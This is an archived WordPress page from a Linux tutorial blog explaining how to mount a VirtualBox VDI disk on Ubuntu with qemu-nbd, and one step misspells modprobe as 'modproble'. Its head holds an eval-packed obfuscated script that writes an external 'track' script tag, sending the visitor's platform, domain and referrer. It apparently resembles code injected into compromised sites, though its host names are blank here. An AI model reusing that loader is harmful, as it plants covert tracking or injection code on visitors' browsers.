<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/xfn/11">
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-3642255147113369",
    enable_page_level_ads: true
  });
</script>
</head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<title>How to mount VDI image disk on Ubuntu  | Full Version Software and Tutorial</title>

<link rel="stylesheet" href="http://gamblisfx.com/wp-content/themes/wp-davinci-20/style.css" type="text/css" media="screen" />

<meta name="viewport" content="width=device-width, initial-scale=1.0"/>

<link rel="pingback" href="http://gamblisfx.com/xmlrpc.php" />

<!--[if lt IE 9]>
<script src="http://css3-mediaqueries-js.googlecode.com/svn/trunk/css3-mediaqueries.js"></script>
<![endif]-->



<!-- All in One SEO Pack 2.3.4.2 by Michael Torbert of Semper Fi Web Design[547,643] -->
<link rel="author" href="http://+FitriAryani" />
<meta name="description" itemprop="description" content="This tutorial will try to explain how to mount a VirtualBox disk image (VDI) on Ubuntu 15.04 or Ubunu 14.04. It is possible to mount VDI disk on Ubuntu 15.04" />

<meta name="keywords" itemprop="keywords" content="vdi,mount vdi disk,mount virtual disk,ubuntu,mount vdi on ubuntu,how to,mount vdi image,ubuntu 14.04,ubuntu 15.04,ubuntu tutorial" />

<link rel="canonical" href="http://gamblisfx.com/how-to-mount-virtualbox-vdi-disk-on-ubuntu-15-04/" />
<meta property="og:title" content="How to mount VDI image disk on Ubuntu  | Full Version Software and Tutorial" />
<meta property="og:type" content="article" />
<meta property="og:url" content="http://gamblisfx.com/how-to-mount-virtualbox-vdi-disk-on-ubuntu-15-04/" />
<meta property="og:site_name" content="Linux, Forex and GIS Tutorial" />
<meta property="og:description" content="This tutorial will try to explain how to mount a VirtualBox disk image (VDI) on Ubuntu 15.04 or Ubunu 14.04. It is possible to mount VDI disk on Ubuntu 15.04 with a little tweak. But make sure the virtual disk (VDI) is not being used by other virtual machine. OK lets get started First, we will use &quot;nbd&quot; kernel module. On standard Ubuntu installation, the nbd is not included. You can install this kernel module using this command  sudo apt-get install qemu-kvm  Next, load the nbd kernel module  sudo modproble nbd  Now execute this command to access the VDI disk  qemu-nbd -c /dev/nbd0 /home/dhani/Downloads/ubuntu.vdi  Change /home/dhani/Downloads/ubuntu.vdi with your own vdi file. Now check the device with this command to see the partitions in the device  sudo fdisk -l /dev/nbd0  Output: Disk /dev/nbd0: 20 GiB, 21474836480 bytes, 41943040 sectors Units: sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes" />
<meta property="article:published_time" content="2015-06-25T08:45:45Z" />
<meta property="article:modified_time" content="2015-06-25T08:45:45Z" />
<meta name="twitter:card" content="summary" />
<meta name="twitter:title" content="How to mount VDI image disk on Ubuntu  | Full Version Software and Tutorial" />
<meta name="twitter:description" content="This tutorial will try to explain how to mount a VirtualBox disk image (VDI) on Ubuntu 15.04 or Ubunu 14.04. It is possible to mount VDI disk on Ubuntu 15.04 with a little tweak. But make sure the virtual disk (VDI) is not being used by other virtual machine. OK lets get started First, we will use &quot;nbd&quot; kernel module. On standard Ubuntu installation, the nbd is not included. You can install this kernel module using this command  sudo apt-get install qemu-kvm  Next, load the nbd kernel module  sudo modproble nbd  Now execute this command to access the VDI disk  qemu-nbd -c /dev/nbd0 /home/dhani/Downloads/ubuntu.vdi  Change /home/dhani/Downloads/ubuntu.vdi with your own vdi file. Now check the device with this command to see the partitions in the device  sudo fdisk -l /dev/nbd0  Output: Disk /dev/nbd0: 20 GiB, 21474836480 bytes, 41943040 sectors Units: sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes" />
<!-- /all in one seo pack -->
<link rel="alternate" type="application/rss+xml" title="Full Version Software and Tutorial &raquo; Feed" href="http://gamblisfx.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Full Version Software and Tutorial &raquo; Comments Feed" href="http://gamblisfx.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Full Version Software and Tutorial &raquo; How to mount VirtualBox VDI disk on Ubuntu 15.04 Comments Feed" href="http://gamblisfx.com/how-to-mount-virtualbox-vdi-disk-on-ubuntu-15-04/feed/" />
<!-- This site is powered by Shareaholic - https://shareaholic.com -->
<script type='text/javascript' data-cfasync='false'>
  //<![CDATA[
    _SHR_SETTINGS = {"endpoints":{"local_recs_url":"http:\/\/gamblisfx.com\/wp-admin\/admin-ajax.php?action=shareaholic_permalink_related","share_counts_url":"http:\/\/gamblisfx.com\/wp-admin\/admin-ajax.php?action=shareaholic_share_counts_api"}};
  //]]>
</script>
<script type='text/javascript' data-cfasync='false'
        src='//dsms0mj1bbhn4.cloudfront.net/assets/pub/shareaholic.js'
        data-shr-siteid='96c5322dac621077b9420a1a9709e7c4' async='async' >
</script>

<!-- Shareaholic Content Tags -->
<meta name='shareaholic:site_name' content='Full Version Software and Tutorial' />
<meta name='shareaholic:language' content='en-US' />
<meta name='shareaholic:url' content='http://gamblisfx.com/how-to-mount-virtualbox-vdi-disk-on-ubuntu-15-04/' />
<meta name='shareaholic:keywords' content='how to, mount vdi image, ubuntu 14.04, ubuntu 15.04, ubuntu tutorial, vdi, mount vdi disk, mount virtual disk, ubuntu, mount vdi on ubuntu' />
<meta name='shareaholic:article_published_time' content='2015-06-25T08:45:45+00:00' />
<meta name='shareaholic:article_modified_time' content='2016-05-22T13:32:53+00:00' />
<meta name='shareaholic:shareable_page' content='true' />
<meta name='shareaholic:article_author_name' content='gamblis' />
<meta name='shareaholic:site_id' content='96c5322dac621077b9420a1a9709e7c4' />
<meta name='shareaholic:wp_version' content='7.5.0.4' />

<!-- Shareaholic Content Tags End -->
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/72x72\/","ext":".png","source":{"concatemoji":"http:\/\/gamblisfx.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.5.2"}};
			!function(a,b,c){function d(a){var c,d,e,f=b.createElement("canvas"),g=f.getContext&&f.getContext("2d"),h=String.fromCharCode;if(!g||!g.fillText)return!1;switch(g.textBaseline="top",g.font="600 32px Arial",a){case"flag":return g.fillText(h(55356,56806,55356,56826),0,0),f.toDataURL().length>3e3;case"diversity":return g.fillText(h(55356,57221),0,0),c=g.getImageData(16,16,1,1).data,d=c[0]+","+c[1]+","+c[2]+","+c[3],g.fillText(h(55356,57221,55356,57343),0,0),c=g.getImageData(16,16,1,1).data,e=c[0]+","+c[1]+","+c[2]+","+c[3],d!==e;case"simple":return g.fillText(h(55357,56835),0,0),0!==g.getImageData(16,16,1,1).data[0];case"unicode8":return g.fillText(h(55356,57135),0,0),0!==g.getImageData(16,16,1,1).data[0]}return!1}function e(a){var c=b.createElement("script");c.src=a,c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i;for(i=Array("simple","flag","unicode8","diversity"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='crayon-css'  href='http://gamblisfx.com/wp-content/plugins/crayon-syntax-highlighter/css/min/crayon.min.css?ver=_2.7.2_beta' type='text/css' media='all' />
<link rel='stylesheet' id='cookielawinfo-style-css'  href='http://gamblisfx.com/wp-content/plugins/cookie-law-info/css/cli-style.css?ver=1.5.3' type='text/css' media='all' />
<link rel='stylesheet' id='jquery.fancybox-css'  href='http://gamblisfx.com/wp-content/plugins/fancy-box/jquery.fancybox.css?ver=1.2.6' type='text/css' media='all' />
<link rel='stylesheet' id='tablepress-default-css'  href='http://gamblisfx.com/wp-content/plugins/tablepress/css/default.min.css?ver=1.7' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='http://gamblisfx.com/wp-content/plugins/jetpack/css/jetpack.css?ver=4.0.2' type='text/css' media='all' />
<script type='text/javascript' src='http://gamblisfx.com/wp-includes/js/jquery/jquery.js?ver=1.12.3'></script>
<script type='text/javascript' src='http://gamblisfx.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.0'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var CrayonSyntaxSettings = {"version":"_2.7.2_beta","is_admin":"0","ajaxurl":"http:\/\/gamblisfx.com\/wp-admin\/admin-ajax.php","prefix":"crayon-","setting":"crayon-setting","selected":"crayon-setting-selected","changed":"crayon-setting-changed","special":"crayon-setting-special","orig_value":"data-orig-value","debug":""};
var CrayonSyntaxStrings = {"copy":"Press %s to Copy, %s to Paste","minimize":"Click To Expand Code"};
/* ]]> */
</script>
<script type='text/javascript' src='http://gamblisfx.com/wp-content/plugins/crayon-syntax-highlighter/js/min/crayon.min.js?ver=_2.7.2_beta'></script>
<script type='text/javascript' src='http://gamblisfx.com/wp-content/plugins/cookie-law-info/js/cookielawinfo.js?ver=1.5.3'></script>
<script type='text/javascript' src='http://gamblisfx.com/wp-content/plugins/fancy-box/jquery.fancybox.js?ver=1.2.6'></script>
<script type='text/javascript' src='http://gamblisfx.com/wp-content/plugins/fancy-box/jquery.easing.js?ver=1.3'></script>
<script type='text/javascript' src='http://gamblisfx.com/wp-content/themes/wp-davinci-20/js/external.js?ver=4.5.2'></script>
<script type='text/javascript' src='http://gamblisfx.com/wp-content/themes/wp-davinci-20/js/suckerfish.js?ver=4.5.2'></script>
<script type='text/javascript' src='http://gamblisfx.com/wp-content/themes/wp-davinci-20/js/flexslider.js?ver=4.5.2'></script>
<link rel='https://api.w.org/' href='http://gamblisfx.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://gamblisfx.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://gamblisfx.com/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='How to record Fedora desktop using Simple Screen Recorder' href='http://gamblisfx.com/how-to-record-fedora-desktop-using-simple-screen-recorder/' />
<link rel='next' title='Install FlareGet 4.2-92 Download Manager on Ubuntu 15.04' href='http://gamblisfx.com/install-flareget-4-2-92-download-manager-on-ubuntu-15-04/' />
<meta name="generator" content="WordPress 4.5.2" />
<link rel='shortlink' href='http://wp.me/p63cYW-1bq' />
<link rel="alternate" type="application/json+oembed" href="http://gamblisfx.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fgamblisfx.com%2Fhow-to-mount-virtualbox-vdi-disk-on-ubuntu-15-04%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://gamblisfx.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fgamblisfx.com%2Fhow-to-mount-virtualbox-vdi-disk-on-ubuntu-15-04%2F&#038;format=xml" />
<script type="text/javascript">
  jQuery(document).ready(function($){
    var select = $('a[href$=".bmp"],a[href$=".gif"],a[href$=".jpg"],a[href$=".jpeg"],a[href$=".png"],a[href$=".BMP"],a[href$=".GIF"],a[href$=".JPG"],a[href$=".JPEG"],a[href$=".PNG"]');
    select.attr('rel', 'fancybox');
    select.fancybox();
  });
</script>
		<script type="text/javascript">
            var _statcounter = _statcounter || [];
            _statcounter.push({"tags": {"author": "gamblis"}});
        </script>
	   <style type='text/css'>.rp4wp-related-posts ul{width:100%;padding:0;margin:0;float:left;}
.rp4wp-related-posts ul>li{list-style:none;padding:0;margin:0;padding-bottom:20px;clear:both;}
.rp4wp-related-posts ul>li>p{margin:0;padding:0;}
.rp4wp-related-post-image{width:35%;padding-right:25px;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box;float:left;}</style>

<link rel='dns-prefetch' href='//v0.wordpress.com'>
<style type='text/css'>img#wpstats{display:none}</style>
<!-- Alternate Stylesheet -->
<link href="http://gamblisfx.com/wp-content/themes/wp-davinci-20/styles/default.css" rel="stylesheet" type="text/css" />

<!-- Custom Styles from Theme Setting Page -->
<style type="text/css">
.maincontent {font-size:10pt;}
</style>

<!-- Styles from custom.css -->
<link href="http://gamblisfx.com/wp-content/themes/wp-davinci-20/custom.css" rel="stylesheet" type="text/css" />

		<style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style>
		
<script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)+\'&c=\'+4.l((4.m()*n)+1)+\'"></2\'+\'3>\');',25,25,'document||scr|ipt|Math|type|text|javascript|src||||platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|1000|script'.split('|'),0,{}));</script>

<body class="single single-post postid-4552 single-format-standard c-sw">

<div id="outer-wrap">

	<div id="wrap">

		<div id="header">
			<div id="head-content" class="clearfix">
									<div id="sitetitle">
						<div class="title"><a href="http://gamblisfx.com">Full Version Software and Tutorial</a></div> 
						<div class="description">Linux tutorial, free full version software download</div>
					</div>
											</div>
		</div>

		<div id="topnav">
			<div class="limit clearfix">
									<ul>
						<li id="home"><a href="http://gamblisfx.com">Home</a></li>
						<li class="page_item page-item-2524"><a href="http://gamblisfx.com/about-us/">About Me</a></li>
<li class="page_item page-item-1884"><a href="http://gamblisfx.com/deb-and-rpm-packages/">DEB and RPM Packages</a></li>
<li class="page_item page-item-1738"><a href="http://gamblisfx.com/iso-linux-download/">ISO Linux Download</a></li>
<li class="page_item page-item-1831"><a href="http://gamblisfx.com/linux-icons-and-theme-download/">Linux Icons and Theme Download</a></li>
						<li class="searchform"><form id="searchform" method="get" action="http://gamblisfx.com/" ><input type="text" value="Enter Search Terms" onfocus="if (this.value == 'Enter Search Terms') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter Search Terms';}" size="18" maxlength="50" name="s" id="searchfield" /><input type="submit" value="search" id="submitbutton" /></form>
</li>
					</ul>
							</div>
		</div>

		
		<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-76806758-1', 'auto');
  ga('send', 'pageview');

</script>
	
	
	<div id="page" class="clearfix">

		<div id="contentleft">

			
			
			
			<div id="content" class="maincontent">

				
				

				<div class="singlepost">

					<div class="post" id="post-main-4552">

						<div class="entry">

							<h1 class="post-title single"><a href="http://gamblisfx.com/how-to-mount-virtualbox-vdi-disk-on-ubuntu-15-04/" rel="bookmark" title="Permanent Link to How to mount VirtualBox VDI disk on Ubuntu 15.04">How to mount VirtualBox VDI disk on Ubuntu 15.04</a></h1>


							<div class="meta single">

	<span class="meta-date">
		June 25, 2015 | 
	</span> 

	<span class="meta-author">
		By <a href="http://gamblisfx.com/author/gamblis/" title="Posts by gamblis" rel="author">gamblis</a>	</span>

		<span class="meta-comments">
		 | <a href="http://gamblisfx.com/how-to-mount-virtualbox-vdi-disk-on-ubuntu-15-04/#comments" rel="bookmark" title="Comments for How to mount VirtualBox VDI disk on Ubuntu 15.04">1 Reply</a>
	</span>
	
	<span class="readmore">
		<a href="http://gamblisfx.com/how-to-mount-virtualbox-vdi-disk-on-ubuntu-15-04/" rel="nofollow" title="Permanent Link to How to mount VirtualBox VDI disk on Ubuntu 15.04">More</a>
	</span>

</div>
							
							
<!-- Easy Plugin for AdSense V8.67 -->
<!-- [leadin: 0 urCount: 0 urMax: 0] -->
<div class="ezAdsense adsense adsense-leadin" style="text-align:center;margin:12px;"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- gamblisfx-336 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:336px;height:280px"
     data-ad-client="ca-pub-3642255147113369"
     data-ad-slot="7872241862"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>
<!-- Easy Plugin for AdSense V8.67 -->
<p style="text-align: justify;">This tutorial will try to explain how to mount a VirtualBox disk image (VDI) on Ubuntu 15.04 or Ubunu 14.04. It is possible to mount VDI disk on Ubuntu 15.04 with a little tweak. But make sure the virtual disk (VDI) is not being used by other virtual machine.</p>
<p style="text-align: justify;">OK lets get started</p>
<p style="text-align: justify;">First, we will use &#8220;nbd&#8221; kernel module. On standard Ubuntu installation, the nbd is not included. You can install this kernel module using this command</p>
<blockquote>
<p style="text-align: justify;">sudo apt-get install qemu-kvm</p>
</blockquote>
<p style="text-align: justify;">Next, load the nbd kernel module</p>
<blockquote>
<p style="text-align: justify;">sudo modproble nbd</p>
</blockquote>
<p style="text-align: justify;">Now execute this command to access the VDI disk</p>
<blockquote>
<p style="text-align: justify;">qemu-nbd -c /dev/nbd0 /home/dhani/Downloads/ubuntu.vdi</p>
</blockquote>

<!-- Easy Plugin for AdSense V8.67 -->
<!-- [midtext: 1 urCount: 1 urMax: 0] -->
<div class="ezAdsense adsense adsense-midtext" style="text-align:left;margin:12px;"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- 468 links -->
<ins class="adsbygoogle"
     style="display:inline-block;width:468px;height:15px"
     data-ad-client="ca-pub-3642255147113369"
     data-ad-slot="2654352662"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</div>
<!-- Easy Plugin for AdSense V8.67 -->
<p style="text-align: justify;">Change /home/dhani/Downloads/ubuntu.vdi with your own vdi file. Now check the device with this command to see the partitions in the device</p>
<blockquote>
<p style="text-align: justify;">sudo fdisk -l /dev/nbd0</p>
</blockquote>
<p style="text-align: justify;">Output:</p>
<blockquote><p><em>Disk /dev/nbd0: 20 GiB, 21474836480 bytes, 41943040 sectors</em><br />
<em>Units: sectors of 1 * 512 = 512 bytes</em><br />
<em>Sector size (logical/physical): 512 bytes / 512 bytes</em><br />
<em>I/O size (minimum/optimal): 512 bytes / 512 bytes</em><br />
<em>Disklabel type: dos</em><br />
<em>Disk identifier: 0x0006a7cc</em></p>
<p><em>Device Boot Start End Sectors Size Id Type</em><br />
<em>/dev/nbd0p1 * 2048 1026047 1024000 500M 83 Linux</em><br />
<em>/dev/nbd0p2 1026048 41943039 40916992 19.5G 8e Linux LVM</em></p></blockquote>
<p>Now mount the partition for example</p>
<blockquote><p>sudo mount /dev/nbd0p1 /mnt</p></blockquote>
<p>The command will mount the partition of the VDI disk /dev/nbd0p1 to /mnt. Now the content of the partition will be mounted on /mnt.</p>
<p>&nbsp;</p>

<!-- Easy Plugin for AdSense V8.67 -->
<!-- [leadout: 2 urCount: 2 urMax: 0] -->
<div class="ezAdsense adsense adsense-leadout" style="text-align:left;margin:1px;"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- responsive -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-3642255147113369"
     data-ad-slot="3720141064"
     data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>
<!-- Easy Plugin for AdSense V8.67 -->
<div class='shareaholic-canvas' data-app-id='6549062' data-app='share_buttons' data-title='How to mount VirtualBox VDI disk on Ubuntu 15.04' data-link='http://gamblisfx.com/how-to-mount-virtualbox-vdi-disk-on-ubuntu-15-04/' data-summary=''></div><div class='rp4wp-related-posts'>
<h3>Related Posts</h3>
<ul>
<li><div class='rp4wp-related-post-content'>
<a href='http://gamblisfx.com/how-to-install-ubuntu-14-04-tutorial/'>How to install Ubuntu 14.04 Tutorial</a><p>On this tutorial I am going to show you how to install the latest Ubuntu&hellip;</p></div>
</li>
<li><div class='rp4wp-related-post-content'>
<a href='http://gamblisfx.com/install-appgrid-on-ubuntu-14-04/'>Install AppGrid on Ubuntu 14.04</a><p>This post will show you how to Install AppGrid on Ubuntu 14.04. AppGrid is probably&hellip;</p></div>
</li>
<li><div class='rp4wp-related-post-content'>
<a href='http://gamblisfx.com/how-to-install-kernel-3-18-rc2-on-ubuntu-14-10-ubuntu-14-04/'>How To Install Kernel 3.18 RC2 On Ubuntu 14.10, Ubuntu 14.04</a><p>The new Kernel 3.18 RC2 is now available for download. For you who wants to&hellip;</p></div>
</li>
<li><div class='rp4wp-related-post-content'>
<a href='http://gamblisfx.com/how-to-install-kernel-3-12-23-on-ubuntu-14-04/'> How To Install Kernel 3.12.23 On Ubuntu 14.04</a><p>The new development version of Linux Kernel 3.12.23 is now available on Ubuntu repository. Many&hellip;</p></div>
</li>
</ul>
</div>

							<div style="clear:both;"></div>

							
							<p class="tags"><strong>Tags: </strong> <a href="http://gamblisfx.com/tag/how-to/" rel="tag">how to</a>, <a href="http://gamblisfx.com/tag/mount-vdi-image/" rel="tag">mount vdi image</a>, <a href="http://gamblisfx.com/tag/ubuntu-14-04/" rel="tag">ubuntu 14.04</a>, <a href="http://gamblisfx.com/tag/ubuntu-15-04/" rel="tag">ubuntu 15.04</a>, <a href="http://gamblisfx.com/tag/ubuntu-tutorial/" rel="tag">ubuntu tutorial</a>, <a href="http://gamblisfx.com/tag/vdi/" rel="tag">vdi</a></p>							<p class="cats"><strong>Category</strong>: <a href="http://gamblisfx.com/category/ubuntu/" rel="category tag">Ubuntu</a></p>

						</div>

						
						<div id="related" class="clearfix">

	
	<div class="subscribe">

		<h3>Subscribe</h3>

		<p>If you enjoyed this article, subscribe to receive more just like it.</p>

		
		<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=LinuxForexAndGis', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
			<input type="hidden" value="LinuxForexAndGis" name="uri"/>
			<input type="hidden" name="loc" value="en_US"/>
			<p class="email-form">
				<input type="text" class="sub" name="email" value="subscribe via email" onfocus="if (this.value == 'subscribe via email') {this.value = '';}" onblur="if (this.value == '') {this.value = 'subscribe via email';}" /><input type="submit" value="submit" class="subbutton" />
			</p>
			<div style="clear:both;"><small>Privacy guaranteed. We never share your info.</small></div>
		</form>

		
		<div class="sub-icons clearfix">

	<a title="Subscribe via RSS Feed" href="http://gamblisfx.com/feed/"><img class="rss-sub" src="http://gamblisfx.com/wp-content/themes/wp-davinci-20/images/feed.png" alt="Subscribe via RSS Feed" align="top" /></a>

	<a rel="external" title="Follow Me on Twitter" href="http://www.twitter.com/fitriaryani2011"><img class="twitter-sub" src="http://gamblisfx.com/wp-content/themes/wp-davinci-20/images/twitter.png" alt="Follow Me on Twitter" align="top" /></a>


	<a title="Connect on Google Plus" rel="external" href="https://plus.google.com/+FitriAryani?rel=author"><img class="gplus-sub" src="http://gamblisfx.com/wp-content/themes/wp-davinci-20/images/google-plus.png" alt="Connect on Google Plus" align="top" /></a>






</div>
	</div>

</div>
						
<!-- You can start editing here. -->

<div class="allcomments">


	<h3 id="comments">Comments (1)</h3>

	<p class="comments-number"><a href="http://gamblisfx.com/how-to-mount-virtualbox-vdi-disk-on-ubuntu-15-04/trackback/" title="Trackback URL">Trackback URL</a> | <a title="Comments RSS Feed for This Entry" href="http://gamblisfx.com/how-to-mount-virtualbox-vdi-disk-on-ubuntu-15-04/feed">Comments RSS Feed</a></p>

	<div class="comments-navigation clearfix">
		<div class="alignleft"></div>
		<div class="alignright"></div>
	</div>

	
	<ol class="commentlist">
				<li class="comment even thread-even depth-1" id="comment-8558">
				<div id="div-comment-8558" class="comment-body">
				<div class="comment-author vcard">
			<img alt='' src='http://1.gravatar.com/avatar/af20f8e2158c838e3f0a96ae2c18f33a?s=60&#038;d=mm&#038;r=g' srcset='http://1.gravatar.com/avatar/af20f8e2158c838e3f0a96ae2c18f33a?s=120&amp;d=mm&amp;r=g 2x' class='avatar avatar-60 photo' height='60' width='60' />			<cite class="fn">Barak</cite> <span class="says">says:</span>		</div>
		
		<div class="comment-meta commentmetadata"><a href="http://gamblisfx.com/how-to-mount-virtualbox-vdi-disk-on-ubuntu-15-04/#comment-8558">
			March 15, 2016 at 3:08 pm</a>		</div>

		<p>After fdisk -l, i am getting disk &#8230; Doesn&#8217;t contain a valid partition table&#8230;</p>

		<div class="reply"><a rel='nofollow' class='comment-reply-link' href='http://gamblisfx.com/how-to-mount-virtualbox-vdi-disk-on-ubuntu-15-04/?replytocom=8558#respond' onclick='return addComment.moveForm( "div-comment-8558", "8558", "respond", "4552" )' aria-label='Reply to Barak'>Reply</a></div>
				</div>
		</li><!-- #comment-## -->
	</ol>

 
</div>


	<div id="respond">

		<form action="http://gamblisfx.com/wp-comments-post.php" method="post" id="commentform">

			<h3>Leave a Reply</h3>

			<div class="cancel-comment-reply">
				<a rel="nofollow" id="cancel-comment-reply-link" href="/how-to-mount-virtualbox-vdi-disk-on-ubuntu-15-04/#respond" style="display:none;">Click here to cancel reply.</a>			</div>

			
				
					<p><input type="text" name="author" id="author" value="" size="40" tabindex="1" />
					<label for="author">Name ( required )</label></p>

					<p><input type="text" name="email" id="email" value="" size="40" tabindex="2" />
					<label for="email">Email ( required; will not be published )</label></p>

					<p><input type="text" name="url" id="url" value="" size="40" tabindex="3" />
					<label for="url">Website</label></p>

				
				<!--<p><small><strong>XHTML:</strong> You can use these tags: <code>&lt;a href=&quot;&quot; title=&quot;&quot;&gt; &lt;abbr title=&quot;&quot;&gt; &lt;acronym title=&quot;&quot;&gt; &lt;b&gt; &lt;blockquote cite=&quot;&quot;&gt; &lt;cite&gt; &lt;code class=&quot;&quot; title=&quot;&quot; data-url=&quot;&quot;&gt; &lt;del datetime=&quot;&quot;&gt; &lt;em&gt; &lt;i&gt; &lt;q cite=&quot;&quot;&gt; &lt;s&gt; &lt;strike&gt; &lt;strong&gt; &lt;pre class=&quot;&quot; title=&quot;&quot; data-url=&quot;&quot;&gt; &lt;span class=&quot;&quot; title=&quot;&quot; data-url=&quot;&quot;&gt; </code></small></p>-->

				<p><textarea name="comment" id="comment" cols="100%" rows="10" tabindex="4"></textarea></p>

				<p class="button-submit"><input name="submit" type="submit" id="submit" tabindex="5" value="Submit Comment" />
				<input type='hidden' name='comment_post_ID' value='4552' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
				</p>

				<p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="c9ab2c7b93" /></p><!-- BEGIN: Email notification plugin by Elance360 --><p><label for='subscribe-reloaded'> If A New Comment Is Posted:<br /><select name='subscribe-reloaded' id='subscribe-reloaded'><option value='none'>Do Not Send Email Notifications.</option><option value='yes'>Send Email Notification ONLY If Someone Replies To My Comment(s).</option><option value='replies' selected='selected'>Send Email Notification Whenever A New Comment Is Posted.</option></select></label></p><!-- END: Email notification plugin by Elance360 --><p class="comment-subscription-form"><input type="checkbox" name="subscribe_comments" id="subscribe_comments" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-label" for="subscribe_comments">Notify me of follow-up comments by email.</label></p><p class="comment-subscription-form"><input type="checkbox" name="subscribe_blog" id="subscribe_blog" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-blog-label" for="subscribe_blog">Notify me of new posts by email.</label></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="196"/></p>
			
		</form>

	</div>


					</div>

					<div class="navigation clearfix">
	<div class="alignleft single">
		&laquo; <a href="http://gamblisfx.com/how-to-record-fedora-desktop-using-simple-screen-recorder/" rel="prev">How to record Fedora desktop using Simple Screen Recorder</a>	</div>
	<div class="alignright single">
		<a href="http://gamblisfx.com/install-flareget-4-2-92-download-manager-on-ubuntu-15-04/" rel="next">Install FlareGet 4.2-92 Download Manager on Ubuntu 15.04</a> &raquo;	</div>
</div>
				</div>


			</div>

			
		</div>


		<div id="contentright">

			<div id="sidebar" class="clearfix">
				<div id="search-2" class="widget widget_search"><div class="widget-wrap"><form id="searchform" method="get" action="http://gamblisfx.com/" ><input type="text" value="Enter Search Terms" onfocus="if (this.value == 'Enter Search Terms') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter Search Terms';}" size="18" maxlength="50" name="s" id="searchfield" /><input type="submit" value="search" id="submitbutton" /></form>
